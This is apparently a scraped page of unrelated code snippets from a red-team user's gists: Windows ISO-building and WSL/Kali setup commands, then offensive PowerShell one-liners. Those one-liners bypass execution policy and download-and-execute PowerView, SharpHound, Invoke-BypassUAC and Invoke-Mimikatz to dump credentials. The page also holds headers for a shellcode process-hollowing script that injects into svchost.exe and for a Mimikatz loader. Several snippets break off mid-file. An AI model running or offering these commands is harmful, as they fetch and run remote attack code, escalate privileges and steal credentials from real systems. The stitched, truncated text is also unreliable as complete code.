AssassinUKG

Intro

”Nuclei is used to send requests across targets based on a template, leading to zero false positives and providing fast scanning on a large number of hosts. Nuclei offers scanning for a variety of protocols, including TCP, DNS, HTTP, SSL, File, Whois, Websocket, Headless etc. With powerful and flexible templating, Nuclei can be used to model all kinds of security checks.”

---

FAQ

• Q: What is nuclei?
• A: Nuclei is a fast and customizable vulnerability scanner based on simple YAML-based templates.

AssassinUKG

# oscdimg.exe is installed along with Microsoft Windows 10 Deployment Toolkit
# located in "C:\Program Files (x86)\Windows Kits\10\Aessessment and Deployment Kit\Deployment Tools"
# Copy executable and etfsboot.com and efisys.bin to same folder as executable so it can resolve
# agrument locations are relative paths, does not seem to support absolute path from root

# 2#p0 stuff is not a typo.

oscdimg.exe -m -o -u2 -udfver102 -bootdata:2#p0,e,betfsboot.com#pEF,e,befisys.bin Win10_source\subfolder unattend_Win10Ent1607x64.iso

oscdimg.exe -m -o -u2 -udfver102 -bootdata:2#p0,e,bd:\workingmount\boot\etfsboot.com#pEF,e,bd:\workingmount\efi\microsoft\boot\efisys.bin d:\workingmount d:\support\Server2016_Test.iso

AssassinUKG

// Copyright (C) 2022 Evan McBroom
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
// 
// The above copyright notice and this permission notice shall be included in

AssassinUKG

Activate wsl2

dism.exe /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux /all /norestart
dism.exe /online /enable-feature /featurename:VirtualMachinePlatform /all /norestart
wsl --set-default-version 2

Install and Configure Ubuntu

AssassinUKG

apt update
apt -y install wget gnupg dirmngr
wget -q -O - https://archive.kali.org/archive-key.asc | gpg --import
gpg --keyserver hkp://keys.gnupg.net --recv-key 44C6513A8E4FB3D30875F758ED444FF07D8D0BF6
echo "deb http://http.kali.org/kali kali-rolling main non-free contrib" >> /etc/apt/sources.list
gpg -a --export ED444FF07D8D0BF6 | sudo apt-key add -
apt update
apt -y upgrade
apt -y dist-upgrade
apt -y autoremove --purge

AssassinUKG

# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"

## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"

## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"

AssassinUKG

<#

DynWin32-ShellcodeProcessHollowing.ps1 performs shellcode based process hollowing using
dynamically looked up Win32 API calls. The script obtains the methods GetModuleHandle,
GetProcAddress and CreateProcess by using reflection. Afterwards it utilizes GetModuleHandle
and GetProcAddress to obtain the addresses of the other required Win32 API calls.

When all required Win32 API calls are looked up, it starts svchost.exe in a suspended state
and overwrites the entrypoint with the specified shellcode. Afterwards, the thread is resumed
and the shellcode is executed enveloped within the trusted svchost.exe process.

AssassinUKG

#requires -version 2
<#

Author: Noah
@subTee's reflexive loader

Required Dependencies: msbuild, csc

Execute: Run-UpdateKatz -Verbose

AssassinUKG

# Description: 
#    Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

# Import Mimikatz Module to run further commands

AssassinUKG

#include <Windows.h>

#include <iostream>
#include "ntdll_undoc.h"

PPEB get_default_peb()
{
#if defined(_WIN64)
    return (PPEB)__readgsqword(0x60);
#else